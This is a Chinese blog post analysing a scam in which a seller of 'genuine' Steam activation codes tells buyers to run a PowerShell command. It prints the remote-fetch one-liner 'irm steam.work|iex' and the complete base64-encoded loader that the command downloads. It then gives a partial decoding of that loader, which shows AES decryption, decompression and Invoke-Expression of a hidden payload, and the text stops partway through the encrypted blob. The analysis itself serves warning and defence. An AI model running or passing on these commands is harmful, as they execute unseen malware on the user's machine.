前言
之前在某宝购买了steam激活码“正版”游戏但是发货后要执行powershell命令我就感觉到了不对劲
irm steam.work|iex分析
按照url下载下来是这样一个powershell命令
powershell -encodedCommand "JAB2AHoAdwBuAGIAcQBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiADEAQQB0AFEAQwAwAG0AegBRAFEARwBEAHkAUwBvAFIATABiAE8AUABQAHcAcgBmACsARABqADcAcQAzAHgAaQBPAGMAaABVAEQAagAzADYAMQBHAFIASwByADQAUgByAHIAQwBYAGUAMwBhAEoAUQBpADIAcgBvAHYAcQBIAFMATABJAGwAOQA2ADgASAAzAFMAaQAzAHUATgBBAFkAeABwAHkAMgBuAC8ANgBMAEQAdwBHAGkANgBXAEsAaABOAGMAagBrAE0AUQBjAHQAZwBRACsALwBhADIARgAzAHIATABWAGwAOQBWAE0AcQAvAEYAagBXAEcAMAB4AG4AcwB3AFYARgA5AFQAMAAyADAAZgByAHYAcwBIAE8ATABLAFYAeQA0AFUAKwA3AHUAMABwAFMAcwBkADIAZQByAFMAcwBUAE8ARgBVAE0AWQBFAGkAVQBaADAAUwBMAFkARwB4AFEANABkAGoAbwBiADEAZABHAHUAYQBrAG4AOAA2ADQAZQBzAGoANgAwAG4ATQAzAFcAUwBHAHIASgBjAEwAUQBHAFMANgAxAG8AaABQAG8AZAB2ADAAVQBpAFEAWABPAGcAOAA3AFkAcABVAHQANQBoAHoAdABUADEAbgA2AHQAeQBKAHgAVwA1ADcAbQBCAEIAdQBzACsAMwBLAFYAQQBxAEUAMgBrAGkATABMACsAdgA4AFIANwA4AE4AQwBHAGMAcQB5AFcAVABhAEQARQA0AGYATwA1ACsAdgBGAHgAKwBpAGcAaABaAC8AMgAyAEIAdgBtAHkAeABsAFUASQBEAGwARQBDAHIATQByAFcAUgBVAE4AVwBtAGEAdQBhAEwAdABhAG4ANwBsAEoANgBPAFYAWQBMADkAMAA1AEkAQwBpAEIASAAzAE0AUgBVADMAVwAyAHoAaQBkADMAYgBDAG4AQwA4AEIAdQBuAC8AeABYAEoALwBqAHcAcgBwAEYAQQBiAGkAdgB0AHkAZABjAGwAaABYAGUARABXAHYAQgBnAHQAbgBFAGsARgBnAHcAWQBtAFcAcgBOAHAAUgBEAGMASgBKAEcAYgBIAHYANABDAEUAWQBhAHkAawB1AG4ATgBrAE0ARQBLADEAbQBDADEAcQBQAFoAawBLAHUAUgBTAC8AMwArAGsARgBGADQARgBQAEoANQA2AGYAbAA5AEEASwBpAC8AaQBJAG4AQQArAEEAMgB6AEUAZwBkAHgASQByAFAAbAAyAEkAegBjAC8AbABTAFoANwBxAEYAWgB5AGYASABvAHQAOABxAGUAawBsADUAMwBHAEMAZwB5ADIATgBhAEUAMABhAFUARgBVAGEAQgA2AE0ATABPAFQATQBaAE4ARgAyAGQAdgBIADkAWABJAFUATwAzAFAAVwBCAGYAQwBkAFMAWQBVAFUAVQBLAHgAdgBaAE8AMgB0ADgASQBPAFMAQQBUAC8ALwBrAEcAUQBGAHYATABtAGIAYwBjAE0ALwBSAEEAcwBFADEAWgBKAFMAbgBIAFMASABjAHAASQA4AFgASQAyADcAdABwAGoAWgBxAHQAWQB4AFIAUABlAGwAbgBHADUAWgA2AGsASwA0AHYAUAB3AHEAUQBCAHQAcwBiADQAOABOACsANgBRADcAdQBNAGcAVwBRADMAMgA1AGYAawA2ADUARwBPADQAeABkAEkAVgBDAHUANQBiAEoANQB0AHEANgAxAGYAWgB2ADQARwByAHoAdwA2AGMAQgBBAHYANQBZAHEAcQBvAEUAKwBSADcANwA3AHIAagBEAHEAWABNADEAbAAwAGkAOQAwAGgAZgBhAGUAVwBhAGgANwBxAGEAaQA0AHgATAB5AEsATgBDAFIANwA1AEUAbQBDAFIAZQBkAGoANgArAHUAWQBOAGMANgBrADIAVwBKAG8ASAA1AFIAZABVAHUAMgBCAFYASwB3AGkAegA1AFkAdQA0AGMAcQBMAFcARwBmAG4AMQBvAGkAMwBxAEQAZQArAHoAWABOAFAAYwBqAGoAMwBZAFEASwB2ADgAawA3ADYATwBzAFEAQQBXAFUAcQBFAEsAbgA1AGYAZQAvAEkAQgBiAEoAbABWADMAOABYAE0AaABRAGcAOQB6AHQAdwBwAE8ARwBmAEgANQB6AHcASABqAEQAVwA1ADMASgBpAGoASgA0AGsAMwBXAFQAagA4AEEAdQBXAEcAWQBaADkARABYADgAUQBYAGMATQBOAFIAUgBJAFgAeQBiAEMAaABPAC8AbwBaAEMAKwBaADQAZAA2ADcATQA3AEgAcQBYAFgATABWAGoASwBiAE8AZwBZAGYAQwBPAGYAQQAzADgATwBiADkAbQAxAG8AUABJAGcATAA1AHoAdgB4ADcARQA4AHkAaQByADEAOQBwAEoAbQBNAEUALwBGAFYAcgA5AG8AZQBJAGoANABNADMARQBCAHcASABmAHYAZwBYAHAAUABrAEMAagBsAEYANAB5AHEAbgBjAFIAYQBSAFEASgBWAGoAQQBiAFMAUQBMAHIAdABXAEQAdABaAGsAUgA3AG0AdgBlAFoAWQB5AG4AcwBBAEMAWABYAFEAbwBtADYARwBSAGkAVQB2AGIAUABuAEcAdAArAFQAaQBzAGkAagA5AFgAdQA3AEkAdwBhAE0AVwBWAFoATQBmAHAAcQBjAEkAbgBMADcAUwBmAC8AWQBSAGoAYQBlAEkAZABxADkAUgBiAFUATQByAFYAVABNADgATgA2AEQAdwA0AEwAUgBZAEIATABpADAAbwBEAFQAZgBMADMAcQB3AGQATQBEADkALwBFAEkAaQBBAGkAcgBGAGMAMQBaAEIAcgBnAEsAeQBRAGsALwBtAHgAcQBVAFkAYgBTAHEAZQBWACsAdQBMADYAaABSAHgAcABnAFMANwBTAEEANABzAC8AbABCAGsAVgBhAHYAQwA2ADIATwB0AFoAcQAvAFIAQQBxAG4AagBLAFIAYQBzAGcAMwBBAGUARwBBAEoAbgBsAFgAdABlAG4AWQB3AHMAQwAzAGEAeQBlAEcARgBaAGoAVQBzAEYAaABuAE4AUwBQAFkAawBQAHAAMgAwAEEASwBuAHQARgBvAEgAUwBWAE4ASgA1AHcARQBaADYAbgAzAEQARQBDAFUASwBjAHQAMQBRAEoAdAArAE8AdQBqAFgAaABUAEQAQwBIAFIATwBNAFYAZwBuADAATABHAFIAdwBaAE0AbwBnADIAMwBLAGgANgBhAHgAWABIAGcAOABFAFgATABRAFkANgBKADgAWgBDADEAeQBYAHgAUABBAEYARwBJACsASwAxAEMASQBIAFEARABVAFUASQA3AHIAWABkAEwAbQBzAGwARQAxADkAbwAvAC8AWABiADMATAB5AG0ATwBaAFkAdQBjAHMAQgB2AEMAYQBjAHcAcQAwAHoAcABkAC8ASABMAGgAYgB6ADIAMAB5AFkAdwA5AEYAVwBDAE0AYwAxAGsAWQBjAGsAeQA2AFQASwBVAHQAVgBCADkASABiAHUAbQAyAEwAUwBIAEcAeQBBAEEAUQBOAHQAZwBkAFIARAAxAGkASABTAHEANgBrADAAdABvAHgAcgBqAEUATgAxAFMAegAzAG0AKwAyAFUAUwBSAGYARQBGAGsAUwBJAG4AVgA4AGMASQBBAEkAdQBSAEgAUgBwAEMANgBaADkAWgBZAGUAWQByAEYARgBqADMANwBUAEcANABnAGoAMABTADcAVABEAEgAegB3ADkAWgB4AEYAaABPAFUATQBwAGwAeQBkAFcARgBFAGMAaABJAEUATwA5AHYAegBXADgATQBaAHkAUgBGAHMARABRADIAbABzAFYASABIAEsAagBoAE0AdAAxAHoAOABQAFkAYgAxAHMAcQBWAHEAMABVAHYAdwBPAEUANAA1ADkAbQBPAHkAUABtAEQARgAxAFkAMABjAEsARQBWADAAOQA1AEQAZwAzAGEAeQB6AFgAeABaADEATABsADQAZgBaAEkAYQBsAE8AWABzAGwAVABmAG0ASgBVAG4AWQA1AG4AVwA1AFAAMwBEAHkAegA0AGQAKwBPAHoAbABIAFQAagBhACsAYQBVAHgAUAB3AEMAZwA1AE4AYQB5AEwAOQBFAFoAMwB0AGMASQBuAEkAeQBPAG8ANAA2AEcAZABhADcALwBvAEgAbQB5AGEAUQBZAE4AdgBkAEoAeABsAFkAdwA4AFgAUwBDAEkAZAA0AEQAVwBrAFUANgBMAHEARwBoAHkAZgBUAFEAYQAvAC8AQQBrAFAARwA1AEcASABFAFcAQgB0AGgATgAwAFIAMwBTAC8AZgBoADIAUgBpAFAAMwA1AC8AWgB4AGIASwA2AE4AZwB2AFMAbQByADYAVAAzAHEAdAAyAE8ALwBRADkAbAA2AEUANgB0AHYATgBIAGIARABLADMALwBWAEcAUwBjAEoAZABkAHkASABRAFAAZAB0AHIAZwBZAHIAaABWAEUAOAB4AFYAMwBTADAAeQByAGUAQgBWAGgATgAvADgAZQBTAGsAQQA2ADIAMwBHAGMAZgBUAG8AaQBRAFcAZwBYAHcAMQBzAFYAUwBWAHEAcQBaAEsAVQB6AEYAYQB4AEYAVgA4ADkASQBwAG8AdQBWADgANgBUAHMASQBoADUATQBOAFEASABVAGwAeQB6AEUAYQA0AGMAdQBsAG4AYgBsAEcANwAyAHgAeABsAEcAdwBSAEsARAAzAGQAcwAxAEYAVgBHADMATgA0AFYARQBVAEMAMABXADMAaQA5AGQATwBGAHEAawBwAGwAVgBoAEgAUQBRAEQAWgBwADcAYQBEAEoAawBtAHIARABRAFUATgA2AHQASQBpAG4AbgBGAC8AdgAwAHgAQQAvADIALwA1AEEAeABVAFUAbgArAFoAYgBxAEYAZABzAHUAdQBEAFAAcgBWADEAagBxAFMAegB6AHgAOQBJAG4ATQBrAHEAMABSAEgAcABKAGMAZABRAEYAQQBRAGYAaAByAHMAeABvAGsAcwBRAHgAMgBxAGIAbQBDAEsAbAB5AHQAbAA4AFoAYQBIADMAagBEADYAeABmAGcAVgA5AEgAQQBXAHgAaQBsAFQANABnAEYARgBpADcAYQBoAHIARgBzAEIANwBqAEwAZgB5AEcAaABIAGwANwBpAGMAMwBsAFcATQBiADAAYgBXAHQATwBpAEgAaAAvADYASAByAGwANABCADYAQgBIAEUAbwBCACsARQBJADcAYwBOAHgAbwBNAGoAWABDAFUAbQBQAFQAZwB0AG8AYwB6AEwAYQBHAGUARQB4ADYAZwBkAFoAUgBoADQAcwBWAGcAVQArAFoANgBIAHcAUQBXAEMATQArAGoAcABjAHUARABOAEMAYgB6AFIAVwAvAEsAZQB1ADAANgBKAEcAdAAvADYAaABXAHMAOQArAEsARwA1ACsASAB1AEgASwBmAG8AawBjAEEAYwAzAEYAdgBvADkAQQA2AEIAVgBTAHIAMQBYAG4AegBoAFkAZgBKAHoAUwA0AEEARQB3AFIASABWAEUAVgBiAE4ASABzAHMAQQB5AEYALwBpAEcATwBMAEUARwBzADUASQB1AFYAdwA0AFQASQBLAGIARwA3AEEAawBxAEUAVAAzADkAOAB5AE4AegAxAEIAMQBSADkAeQBlAEEAKwByAC8AUQBSADQATwBjAGcAVgBOAEEAZwBTAEUAcwBSAEkAdgBrAGsASQBOADIAVgAzAFMATwByADUANwBBAEYAQQBOADkAKwBoAGoATgBqAEYAZQBhAGIAUgBiAHUAZgAwAEsAUAA4AGgAWgA5AGUAQgBnAG0AbgB0AE0AYwBKAE4AUgBtAHMAcwBZAE4ATAA3ADEAZgBnADcAWABtAHQAOQBFAGoAOQA1AHoAOABaAFIASgB4AGkAYwA0AGwATQAxADkAQgBtAGQAOAAxAGsAOABPAEoAbQBkAEcAbgA0AFcARwBFAFoAYQBmAEsAQQBqAGsAWQBvAHQAcQB4AFUANQA0AGEAVAAxADMAVwBOAHYAdAAxAFQAMAB4AEYAMABhAHoAeQBtADEAaQBrADkANwBWADcAVAByAEYAegBKAEcASwBzAFUANQBQAHgAdQBSAGcAdAA4ADMAdgBlADkAOQB3AEMAOQBqAFUAVQB3ADAATgBjAFMAUQBBAC8ATABZAC8ASwBHAEEAKwBqAHMAcgA4ADQAOABnAE4AUgA4AGMARwBpAGcAcgBKAHgANQBpAE4ASwBDAHoAegA0AGMARABnAEgARQBoAFIAKwA0AGIATQBUAHUAOQB1AEEAVgBvADcAaAAvADgASQA5AEkAcQBuADcARwBIAGUAeABWAG0AMwBxAFYAVQAvAHAAZABpAHEAbwBkAHUASABSAG0AVAA2ADgATwBGAE8AZwArAGwAcQBRAGIAegBXAGYAbgBiADYAMQBqAHUAUQBxAEgANABBADkAYQBZAFYATgB0AEEAcQBwAHMAUQB1ADgAUQBLAG8ATABKAEoAOQBtAHYAWQBKAHAAcwBRAHIAQQAyADgAaABPADQAawBsAHgAZgBmAFoAZAB0AGgAMABiAHgAUwBOAEEAdgBaADMAUwB0AHoANABUAHYAWABYADUAZABaAG8ASABzADcASwA3AGQAaABLADQAaABlADkAcgBSAFcAMgAyAEYAdQBuAEkAMwBTAGcAQQA5AHkAUgBhAHYAcQB5AHcAVwBEAHgAUQBJAEwAMwBaAEcAYQBFADkANgBLAFgAaQBDAE8ARABoAHcAawBVAGsAcgBDAEUAOABqAGsALwBjAE4ANAB0AEQATABRAHgAUQBPAHAARgBOAFoAdwBpAE4AMAB5AEMAKwBwADUAQgBrAHcAMgAwAGEAVABWAHIAcAB3AE0AYwBKAHYALwByAEcAMwBTAFIAbQAxAEsAZgB3AG8AUwBDAGQAbQA2ADAALwBNAGoARABNADEAUwBoAHEAcgBRADEAYQB1AEIAMQA1AGoANQA3AEsAWAAyAFoAagBQADgARgBPAEIANwBnAE4AdwBwAEMAUQBqAEoAOQBSAHUAbAByADAAWgBSAGUAbgBoAEQATgBpAGoAagA0AE0AQwBUAEIATABIAEMAdQB5ADkASABzAHAAcwBYAHgAbwA5AEoARgBWADkAegB5AE8ASABPAEMAZQA0AE4ARQB2AEwARABvAEUAUgArAGoANgBBAHUAZgBVAHYASwBlAHoANABzAHMAawBWADUATwB4AEoARQByAFMAcgBhAEQASwBUAHgANwBvAHQAawB3ACsAYQB5ADEAWgAyAHcAcgBqAGsAKwBhAHMAWQBBAHQATgBWAGsAeAA5AHIAOQBUAEoAWgBoAFIAbgB5ADkAYQAwADYAQwBmAFcAWAA3AEMAMgBoAHEARwA0ADIAMgBGAHUAVQBQAHMAZgBZAFUAZgBoADYAawBZAHMAcABzAC8AcwA3AHAAMwBwADgAOABpAHkAeABnAEEAVwBNAGEAZgAzAFgAbwBlAFYAaQArADEASgB3AFgAYgAwAEMAcwB0AFYAVwBUAGYAVAB0AEEAeABGAFIAUQBRAFgAdQBUAFIAbQB6AHkAbQBCAEgAcAAxADEAUwB0AHoAagAwADYATgA1AEIAbABtAEcATgArAHcAQgBGAFgAaABZAE4AUABwAE8AZQA0AGMAbgBPAEIATQBSAGQARABIAG4ASQBMADcANABRAFoATwA0AGMAWABsAHoAVQBWAHQAVgBEAE4ANABMAHcALwBtAGIAUwBUAHAAKwBaADYASwBYAFcAdABjAHYAQQA4AE8AZwBjAHoATQA4AGIANQA1AEkAcABkAGIAYgBaAGcATwBWADYAVwBnAEMAawBKAHMAVwB5ADYAdQA5AE0AYgBaADQALwBPAHEAbAB2AEkAdQBWAG0AWAAyADcAeQBXAHkAbgB3AGgAUQBqAGgAagA0ADEAcwBLADgAcABRAGcATwBHAEgANwBMADkARgBHADUAdwBLAHYAbwBrAEEAZgBJAEYAOQA3AFkAcwBOAE8ATwB5AFcASwA2AGwATgAxAFoAMQAwAE4AQwBPAFcAdAA3AHAAawBDAGcAWgBXAEkANABRAGIATQBDAGUAMQBWAEcAbQBvAFgATQBLAHYAUQBUAEMAVwBMADQAWABpADAAZABlAHcAZQBNAG0AMQBTAEgAcABqAE8ASABqAGsAcwBZADcAOQBQADQAdwBkAE4AcwBmAEgAagBNAFEAdQA4AEsAWgBSADcAQwA0AHEAQgBpADQAUABmACsAbwByADIASwBFAE0ANAA0AEEAaQA4AGsAbABNADcAbABkAE4AdgBpAGkAagBWAEMAWgBMAEEAZABjAFgAcQAwAFQAWABnAFQAMABYADAAZQBvAEsAcABmAEIANQBHADUASQBSAGkAUABOAHgAYwBCADYAQgA2AFgASgBnAEEAbwBoAEoAVAArAHoANQA0AGkAVgBlAGkAawBJAFoAdwBoAGwAUQBWAEkAMgArAG0AYQBCAFgAbgAyAGEARQA5AHkAMABxAGgATQAvAE4AWABxAGUAaABuADYARgBsAGIAUQBWAE4AbAA1ADYASwBWAGoAdQBQAFAAZwAvACsAVABxAEQAegA3AHoAZQB3AGUAQwBZAGIAbAAzAGkAVgBQAEoAaQBkAG0AcQA4AGsAYQBtADMATABpADYAMQArAEIAbgBzAGsANABkAG4ASABMAFEAbABRAHAAcwBFAFQAUgBSAGQAeABYAHgAVgBjAGEARABiADcASABlAGIAcQBKADYAVQBwAEYAUABHAGEAeQBEAFUASAB3AG4ASgA4AHMAKwBQAGEAVwBnAFIASABUAHYANgBwADQAMQBoAFoAcgBjAEUAMgBiAGQAWQArADAAbgA0AFAATABvAFkATwBpADEAUwBDADMARwB3AFYASgA2AFIAMQBxAEwARQB0AFgASgB6AFgATQBDAEUASwA5AFcAQQBHAEoANwAxAGsAegBFAE8AWQBDAFUAbABsAEwAYwBRAHoARgBNAHYAVgBEAE0AMgA0AGYAZgBNAHcAMgBmAGEAYwBkAHMAdwBXAHcAVQBRAG4AaABkADcAbABQAHAAKwBIAHkAOQBqADEAYgBIAC8AMgBjADUARABIAEUATwBKAGwATQBQAHQAUQBkAEsAOABDAGkASAA2AE8AWgBCADMAMgAvAFMAbgBEAGIASgBSAGkAMAA3ADgAaQBRAEUAVQA5AG4AVABtAGcAQwBhAGcAZQBIAG8AYwBCAE8AMQA3AFEAcgBSAGYAYQBaADQAOAB5AGwAYQArAFMASwA3ADUAUQAwAEwATgBJAHkATwBGAEcAOQBBAFAAZgAxAGoASQBuAFMANgBkACsANgB5AHQAMQAxAHcAWgAxAHoAegBkAHkASQBmAFcAbgBnAFEAQwBFAG4AeABFAEgAaQA4AFIAdABUAFMAMwB1AHYAYgBYAFkARQBPADQAWQBHAE0ALwBKAFcAUwBsADMAaABPAE8AbABVADIARAAxAHUAdwBOAG0AOAB4ADcAeAB5AHkAbgBQAC8AUABXADEAaQBzADMALwBBAGYAcAA1AG4AagBnAGMAawBNAGQAUgBpADEAUwBHAGMAYwBRAHgAUwByAEkAawB2AFIAcgBiAEIAOABrAGwAcgBQADIAbgB3AG4AQgBBAEkAWgBtAFEAZwBCAFgARAA2AGYAUQBVAHgAQQBvADAAZwBBAHIARgBNADkAQgA0AFgAegBFAFAARgBvAEsAeABFAHYANABMAEwAUwBKACsASwBMAEsAZgBmAGYAZQByAFkAYQAzADkAdQBDAE0ASQA5AEEAMABZAEQAZQBjAEwAMABRAE4AbQBWAG4ATQBVAGUAMgBhAEIAUQAwAFMAdwB3AFUAYQAxAEYATwAwAFoAcQBaAEUANwBjAEMAVQA5AHUAagB4AFUARQBnAC8AKwAwAEQAOAAiACkADQAKACQAYgBtAG8AeQBxAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAVQBBADIASwBiAEcAaQBMAHUATABZAEsARwBOAEsAWABwADAASQA4ADUAUwBLADkAQQBEADEAQgBPAGEAYwAvAGEAMABuAEcAegA0AEIAYwA5AFoAcwA9ACIAKQANAAoAJABoAGoAZgBtAHAAeQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAIgBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMATQBhAG4AYQBnAGUAZAAiAA0ACgAkAGgAagBmAG0AcAB5AC4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEUAQwBCAA0ACgAkAGgAagBmAG0AcAB5AC4AUABhAGQAZABpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBQAGEAZABkAGkAbgBnAE0AbwBkAGUAXQA6ADoAUABLAEMAUwA3AA0ACgAkAGgAagBmAG0AcAB5AC4AQgBsAG8AYwBrAFMAaQB6AGUAIAA9ACAAMQAyADgADQAKACQAaABqAGYAbQBwAHkALgBLAGUAeQBTAGkAegBlACAAPQAgADEAMgA4AAoAJABoAGoAZgBtAHAAeQAuAEsAZQB5ACAAPQAgACQAYgBtAG8AeQBxAGMADQAKACQAaABqAGYAbQBwAHkALgBJAFYAIAA9ACAAJAB2AHoAdwBuAGIAcQBkAFsAMAAuAC4AMQA1AF0ADQAKACQAbgBjAHoAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQANAAoAJAB3AHYAcABxAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsACQAaABqAGYAbQBwAHkALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACkALgBUAHIAYQBuAHMAZgBvAHIAbQBGAGkAbgBhAGwAQgBsAG8AYwBrACgAJAB2AHoAdwBuAGIAcQBkACwAMQA2ACwAJAB2AHoAdwBuAGIAcQBkAC4ATABlAG4AZwB0AGgALQAxADYAKQApAA0ACgAkAGoAYwBhAGkAYgBzAHgAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAgACQAdwB2AHAAcQBtACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApAA0ACgAkAGoAYwBhAGkAYgBzAHgALgBDAG8AcAB5AFQAbwAoACQAbgBjAHoAYgApAA0ACgAkAGgAagBmAG0AcAB5AC4ARABpAHMAcABvAHMAZQAoACkADQAKACQAagBjAGEAaQBiAHMAeAAuAEMAbABvAHMAZQAoACkADQAKACQAdwB2AHAAcQBtAC4AQwBsAG8AcwBlACgAKQANAAoAJAB3AHYAcgBlAHEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABuAGMAegBiAC4AVABvAEEAcgByAGEAeQAoACkAKQANAAoASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJAB3AHYAcgBlAHEAKQANAAoA"base64解码后:
$vzwnbqd = [System.Convert]::FromBase64String("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